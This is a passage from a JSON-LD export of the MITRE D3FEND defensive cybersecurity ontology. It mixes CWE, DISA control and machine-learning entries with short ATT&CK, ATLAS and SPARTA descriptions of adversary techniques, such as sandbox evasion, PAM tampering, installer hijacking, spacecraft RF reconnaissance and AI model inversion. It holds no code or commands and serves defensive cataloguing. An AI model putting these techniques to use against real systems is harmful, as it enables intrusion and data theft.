        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MFRL",
      "d3f:definition": "In reinforcement learning (RL), a model-free algorithm (as opposed to a model-based one) is an algorithm which does not use the transition probability distribution (and the reward function) associated with the Markov decision process (MDP),which, in RL, represents the problem to be solved. The transition probability distribution (or transition model) and the reward function are often collectively called the \"model\" of the environment (or MDP), hence the name \"model-free\". A model-free RL algorithm can be thought of as an \"explicit\" trial-and-error algorithm. An example of a model-free algorithm is Q-learning.",
      "d3f:kb-article": "## References\nModel-free (reinforcement learning). Wikipedia. [Link](https://en.wikipedia.org/wiki/Model-free_(reinforcement_learning)).)",
      "rdfs:label": "Model-free Reinforcement Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:ReinforcementLearning"
      }
    },
    {
      "@id": "d3f:OTChangeControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a remote device to modify an existing control program.",
      "d3f:modifies": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:comment": "GE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: CHANGE PLC CPU PRIVILEGE LEVEL\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY",
      "rdfs:label": "OT Change Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommand"
        },
        {
          "@id": "_:Nc4f98cc934994dc18edb13952ce74626"
        }
      ]
    },
    {
      "@id": "_:Nc4f98cc934994dc18edb13952ce74626",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:WindowsRegistryValueGetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the data of a registry value is retrieved, typically to read its configuration or state.",
      "rdfs:label": "Windows Registry Value Get Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryValueEvent"
        },
        {
          "@id": "_:N2723865a4d7f4024aa621f5494220ae5"
        }
      ]
    },
    {
      "@id": "_:N2723865a4d7f4024aa621f5494220ae5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValueSetEvent"
      }
    },
    {
      "@id": "d3f:T1564.014",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.014",
      "d3f:definition": "Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`,  `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux)",
      "rdfs:label": "Extended Attributes",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:CWE-594",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-594",
      "d3f:definition": "When the J2EE container attempts to write unserializable objects to disk there is no guarantee that the process will complete successfully.",
      "rdfs:label": "J2EE Framework: Saving Unserializable Objects to Disk",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1076"
        },
        {
          "@id": "d3f:CWE-710"
        }
      ]
    },
    {
      "@id": "d3f:MovingAverageModel",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MAM",
      "d3f:definition": "the moving-average model (MA model) is an approach for modeling univariate time series and specifies that the output variable is cross-correlated with a non-identical to itself random-variable.",
      "d3f:kb-article": "## Refrences\nWikipedia. (n.d.). Moving average model. [Link](https://en.wikipedia.org/wiki/Moving_average_model)",
      "d3f:synonym": "MA Model",
      "rdfs:label": "Moving Average Model",
      "rdfs:subClassOf": {
        "@id": "d3f:TimeSeriesAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForScanningRemoteServicesToLocateStoredObjectsWithMalware",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US11368475B1/"
      },
      "d3f:kb-abstract": "A system and method for retrieval and analysis of stored objects for malware is described. The method involves receiving a scan request message from a customer to conduct analytics on one or more objects stored within a third-party controlled service. In response to receipt of the scan request message, the system generates a redirect message. The redirect message redirects the customer to an authentication portal of the third-party controlled service operating as a logon page and configures receipt by the system of access credentials for the third-party controlled service upon verification of the customer. Using the access credentials, the system is able to retrieve the one or more objects using the access credentials and performing analytics on each object of the one or more objects to classify each object as malicious or benign.",
      "d3f:kb-author": "Sai Vashisht",
      "d3f:kb-organization": "Mandiant Inc, FireEye Security Holdings US LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:EmailRemoval"
      },
      "d3f:kb-reference-title": "System and method for scanning remote services to locate stored objects with malware",
      "rdfs:label": "Reference - System and method for scanning remote services to locate stored objects with malware"
    },
    {
      "@id": "d3f:ParticleRadiationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ParticleRadiationHardening"
      ],
      "d3f:definition": "The application of material, process, layout, or circuit-level design measures to electronic systems and components to reduce susceptibility to total ionizing dose degradation and single-event effects caused by ionizing particles such as protons, heavy ions, neutrons, or electrons.",
      "d3f:synonym": "Ionizing Particle Hardening",
      "rdfs:isDefinedBy": {
        "@id": "https://www.mdpi.com/2079-9292/10/17/2144"
      },
      "rdfs:label": "Particle Radiation Hardening",
      "rdfs:subClassOf": {
        "@id": "d3f:RadiationHardening"
      }
    },
    {
      "@id": "d3f:WindowsNtCreateProcessEx",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtCreateProcessEx",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:REC-0008.04",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008.04",
      "d3f:definition": "Threat actors map contractual and operational relationships to identify the weakest well-connected node. They enumerate primes and subs (bus, payload, ground, launch), managed service providers, ground-network operators, cloud/SaaS tenants, testing and calibration labs, logistics and customs brokers, and warranty/repair depots, plus who holds remote access, who moves money, and who approves changes. Public artifacts (press releases, procurement records, org charts, job postings, conference bios) and technical traces (email MX/DMARC, shared SSO/IdP providers, cross-domain service accounts) reveal trust bridges between enclaves. Shipment paths and integration schedules expose when and where hardware and sensitive data concentrate. Understanding these ties enables tailored phishing, invoice fraud, credential reuse, and supply-chain insertion timed to integration milestones.",
      "rdfs:label": "Business Relationships - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0008"
      },
      "skos:prefLabel": "Business Relationships"
    },
    {
      "@id": "d3f:T1591.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591.001",
      "d3f:definition": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.",
      "rdfs:label": "Determine Physical Locations",
      "rdfs:subClassOf": {
        "@id": "d3f:T1591"
      }
    },
    {
      "@id": "d3f:T1578",
      "@type": "owl:Class",
      "d3f:attack-id": "T1578",
      "d3f:definition": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.",
      "rdfs:label": "Modify Cloud Compute Infrastructure",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1497.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1497.003",
      "d3f:definition": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.",
      "d3f:may-invoke": {
        "@id": "d3f:GetSystemTime"
      },
      "d3f:may-run": {
        "@id": "d3f:SystemTimeApplication"
      },
      "rdfs:label": "Time Based Checks",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1497"
        },
        {
          "@id": "_:Nc50dbfe264024e199d89e36080ede045"
        },
        {
          "@id": "_:Ne3360bd200a5421d9452aa762d373f64"
        }
      ]
    },
    {
      "@id": "_:Nc50dbfe264024e199d89e36080ede045",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemTime"
      }
    },
    {
      "@id": "_:Ne3360bd200a5421d9452aa762d373f64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-run"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemTimeApplication"
      }
    },
    {
      "@id": "wptmp:entity#Reference%20-%20DNS%20Whitelist%20(DNSWL)%20Email%20Authentication%20Method%20Extension",
      "d3f:kb-author": "Alessandro Vesely"
    },
    {
      "@id": "d3f:CCI-002475_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to prevent unauthorized modification of organization-defined information at rest on organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002475"
    },
    {
      "@id": "d3f:T1574.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.005",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.",
      "d3f:modifies": {
        "@id": "d3f:ServiceApplication"
      },
      "rdfs:label": "Executable Installer File Permissions Weakness",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N4136d94605af499792f6659c0dc1de4f"
        }
      ]
    },
    {
      "@id": "_:N4136d94605af499792f6659c0dc1de4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:InternetBasedAttacker",
      "@type": "owl:Class",
      "d3f:definition": "A remote attacker who leverages the internet to conduct attacks, such as through phishing, malware, or direct network attacks.",
      "rdfs:label": "Internet-based Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RemoteAttacker"
        },
        {
          "@id": "_:N8df757447bdc4d3d96bc8eeeee929b1c"
        }
      ]
    },
    {
      "@id": "_:N8df757447bdc4d3d96bc8eeeee929b1c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WideAreaNetwork"
      }
    },
    {
      "@id": "d3f:HTTPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Hypertext Transfer Protocol (HTTP), which operates over TCP to transmit hypermedia documents.",
      "rdfs:label": "HTTP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/http_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:N16d98d16f23d4d94bff40df8a22998e7"
        }
      ]
    },
    {
      "@id": "_:N16d98d16f23d4d94bff40df8a22998e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2014-11-007-RemoteWindowsManagementInstrumentation_WMI_OverRPC_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": ""
      },
      "d3f:kb-abstract": "As described in ATT&CK, an adversary can use Windows Management Instrumentation (WMI) to view or manipulate objects on a remote host. It can be used to remotely edit configuration, start services, query files, and anything that can be done with a WMI class. When remote WMI requests are over RPC (CAR-2014-05-001), it connects to a DCOM interface within the RPC group netsvcs. To detect this activity, a sensor is needed at the network level that can decode RPC traffic or on the host where the communication can be detected more natively, such as Event Tracing for Windows. Using wireshark/tshark decoders, the WMI interfaces can be extracted so that WMI activity over RPC can be detected.\n\nAlthough the description details how to detect remote WMI precisely, a decent estimate has been to look for the string RPCSS within the initial RPC connection on 135/tcp. It returns a superset of this activity, and will trigger on all DCOM-related services running within RPC, which is likely to also be activity that should be detected between hosts. More about RPCSS at : rpcss_dcom_interfaces.html",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-007: Remote Windows Management Instrumentation (WMI) over RPC",
      "rdfs:label": "Reference - CAR-2014-11-007: Remote Windows Management Instrumentation (WMI) over RPC - MITRE"
    },
    {
      "@id": "d3f:AML.TA0015",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0015",
      "d3f:definition": "The adversary is trying to move through your AI environment.\n\nLateral Movement consists of techniques that adversaries may use to gain access to and control other systems or components in the environment. Adversaries may pivot towards AI Ops infrastructure such as model registries, experiment trackers, vector databases, notebooks, or training pipelines. As the adversary moves through the environment, they may discover means of accessing additional AI-related tools, services, or applications. AI agents may also be a valuable target as they commonly have more permissions than standard user accounts on the system.",
      "rdfs:label": "Lateral Movement - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0015"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Lateral Movement"
    },
    {
      "@id": "d3f:CCI-002740_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to authenticate organization-defined software or firmware components prior to installation.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableAllowlisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002740"
    },
    {
      "@id": "d3f:CWE-669",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-669",
      "d3f:definition": "The product does not properly transfer a resource/behavior to another sphere, or improperly imports a resource/behavior from another sphere, in a manner that provides unintended control over that resource.",
      "rdfs:label": "Incorrect Resource Transfer Between Spheres",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-001127_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects the integrity of transmitted information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001127"
    },
    {
      "@id": "d3f:CCI-000143_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a warning when allocated audit record storage volume reaches an organization-defined percentage of maximum audit record storage capacity.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-20T00:00:00"
      },
      "rdfs:label": "CCI-000143"
    },
    {
      "@id": "d3f:T1556.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1556.003",
      "d3f:definition": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)",
      "d3f:may-modify": [
        {
          "@id": "d3f:OperatingSystemConfigurationFile"
        },
        {
          "@id": "d3f:OperatingSystemSharedLibraryFile"
        }
      ],
      "rdfs:label": "Pluggable Authentication Modules",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1556"
        },
        {
          "@id": "_:N9429c7e10fdc4f3b86d767c613435be3"
        },
        {
          "@id": "_:Nfcf32dfc57bb455fb4c9eb53e21fa7e9"
        }
      ]
    },
    {
      "@id": "_:N9429c7e10fdc4f3b86d767c613435be3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "_:Nfcf32dfc57bb455fb4c9eb53e21fa7e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemSharedLibraryFile"
      }
    },
    {
      "@id": "d3f:Skewness",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SKE",
      "d3f:definition": "Skewness is a measure of the asymmetry of the probability distribution of a real-valued random variable about its mean. The standardized moment of a probability distribution function.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Skewness. [Link](https://en.wikipedia.org/wiki/Skewness)",
      "rdfs:label": "Skewness",
      "rdfs:subClassOf": {
        "@id": "d3f:DistributionProperties"
      }
    },
    {
      "@id": "d3f:AML.T0024.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0024.001",
      "d3f:definition": "AI models' training data could be reconstructed by exploiting the confidence scores that are available via an inference API.\nBy querying the inference API strategically, adversaries can back out potentially private information embedded within the training data.\nThis could lead to privacy violations if the attacker can reconstruct the data of sensitive features used in the algorithm.",
      "rdfs:label": "Invert AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0024.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0024"
      },
      "skos:prefLabel": "Invert AI Model"
    },
    {
      "@id": "d3f:ExecutableFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Subroutine"
      },
      "d3f:definition": "In computing, executable code or an executable file or executable program, sometimes simply an executable, causes a computer \"to perform indicated tasks according to encoded instructions,\" as opposed to a data file that must be parsed by a program to be meaningful. These instructions are traditionally machine code instructions for a physical CPU. However, in a more general sense, a file containing instructions (such as bytecode) for a software interpreter may also be considered executable; even a scripting language source file may therefore be considered executable in this sense. The exact interpretation depends upon the use; while the term often refers only to machine code files, in the context of protection against computer viruses all files which cause potentially hazardous instruction",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Executable"
      },
      "rdfs:label": "Executable File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:Ne5b5c09cfa744a7c964f638e3d3ab51b"
        }
      ],
      "skos:altLabel": "Executable"
    },
    {
      "@id": "_:Ne5b5c09cfa744a7c964f638e3d3ab51b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:T1564.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.003",
      "d3f:definition": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.",
      "d3f:may-modify": [
        {
          "@id": "d3f:PropertyListFile"
        },
        {
          "@id": "d3f:SystemConfigurationDatabase"
        }
      ],
      "rdfs:label": "Hidden Window",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N0d6107a72e064312a496fe7f3d8e2f01"
        },
        {
          "@id": "_:Ncc6bf8be311f4822aa94602a44f4ebac"
        }
      ]
    },
    {
      "@id": "_:N0d6107a72e064312a496fe7f3d8e2f01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "_:Ncc6bf8be311f4822aa94602a44f4ebac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:REC-0003.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003.01",
      "d3f:definition": "Adversaries inventory space and ground RF equipment to infer capabilities, limits, and attack surfaces. On the spacecraft, they seek antenna type and geometry, placement and boresight constraints, polarization, RF front-end chains, transponder type, translation factors, gain control, saturation points, and protective features. On the ground, they collect dish size/aperture efficiency, feed/polarizer configuration, tracking modes, diversity sites, and backend modem settings. Beacon frequency/structure, telemetry signal type, symbol rates, and framing reveal demodulator parameters and help an actor build compatible SDR pipelines. Knowledge of power budgets and AGC behavior enables strategies to push hardware into non-linear regimes, causing self-inflicted denial or intermodulation. Equipment location and mounting inform visibility and interference opportunities.",
      "rdfs:label": "Communications Equipment - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0003"
      },
      "skos:prefLabel": "Communications Equipment"
    },
    {
      "@id": "d3f:WebServerApplication",
      "@type": "owl:Class",
      "d3f:definition": "A web server application handles HTTP requests from clients, serves static content, and may act as a reverse proxy or load balancer.",
      "rdfs:label": "Web Server Application",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:RemovableMediaDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A removable media device is a hardware device used for computer storage and that is designed to be inserted and removed from the system.  It is distinct from other removable media in that all the hardware required to read the data are built into the device.  So USB flash drives and external hard drives are removable media devices, whereas tapes and disks are not, as they require additional hardware to perform read/write operations.",
      "rdfs:label": "Removable Media Device",
      "rdfs:seeAlso": {
        "@id": "dbr:Removable_media"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:Prolog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PRO",
      "d3f:definition": "Prolog has its roots in first-order logic, a formal logic, and unlike many other programming languages.",
      "d3f:kb-article": "## How it works\nProlog is intended primarily as a declarative programming language: the program logic is expressed in terms of relations, represented as facts and rules. A computation is initiated by running a query over these relations.\n\n## References\n1. Prolog. (2023, April 5). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Prolog)",
      "rdfs:label": "Prolog",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicProgramming"
      }
    },
    {
      "@id": "d3f:AML.TA0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0005",
      "d3f:definition": "The adversary is trying to run malicious code embedded in AI artifacts or software.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system.\nTechniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.\nFor example, an adversary might use a remote access tool to run a PowerShell script that does [Remote System Discovery](https://attack.mitre.org/techniques/T1018/).",
      "rdfs:label": "Execution - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Execution"
    },
    {
      "@id": "d3f:confidence",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "confidence",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-001%3AAttemptToAddCertificateToUntrustedStore_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-001/"
      },
      "d3f:kb-abstract": "Adversaries may add their own root certificate to the certificate store, to cause the web browser to trust that certificate and not display a security warning when it encounters the previously unseen certificate. This action may be the precursor to malicious activity.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-001: Attempt To Add Certificate To Untrusted Store",
      "rdfs:label": "Reference - CAR-2021-05-001: Attempt To Add Certificate To Untrusted Store - MITRE"
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-010%3ACMSTP_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-010/"
      },
      "d3f:kb-abstract": "CMSTP.exe is the Microsoft Connection Manager Profile Installer, which can be leveraged to setup listeners that will receive and install malware from remote sources in trusted fashion. When CMSTP.exe is seen in combination with an external connection, it is a good indication of this TTP.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-010: CMSTP",
      "rdfs:label": "Reference - CAR-2020-11-010: CMSTP - MITRE"
    },
    {
      "@id": "d3f:CWE-583",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-583",
      "d3f:definition": "The product violates secure coding principles for mobile code by declaring a finalize() method public.",
      "rdfs:label": "finalize() Method Declared Public",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:ApplicationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that captures the behavior, state, or interactions of software applications or services operating within a system. Application events encompass lifecycle changes, configuration updates, and operational anomalies, providing insight into the health and performance of software components.",
      "rdfs:label": "Application Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/application_lifecycle"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nbabb2485b9f7467ca937f474e9d1bf8a"
        }
      ]
    },
    {
      "@id": "_:Nbabb2485b9f7467ca937f474e9d1bf8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:CorrelationClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CC",
      "d3f:definition": "Correlation clustering provides a method for clustering a set of objects into the optimum number of clusters without specifying that number in advance.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Correlation clustering. [Link](https://en.wikipedia.org/wiki/Correlation_clustering)",
      "rdfs:label": "Correlation Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:High-dimensionClustering"
      }
    },
    {
      "@id": "d3f:CWE-1066",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1066",
      "d3f:definition": "The product contains a serializable data element that does not have an associated serialization method.",
      "rdfs:label": "Missing Serialization Control Element",
      "rdfs:subClassOf": {
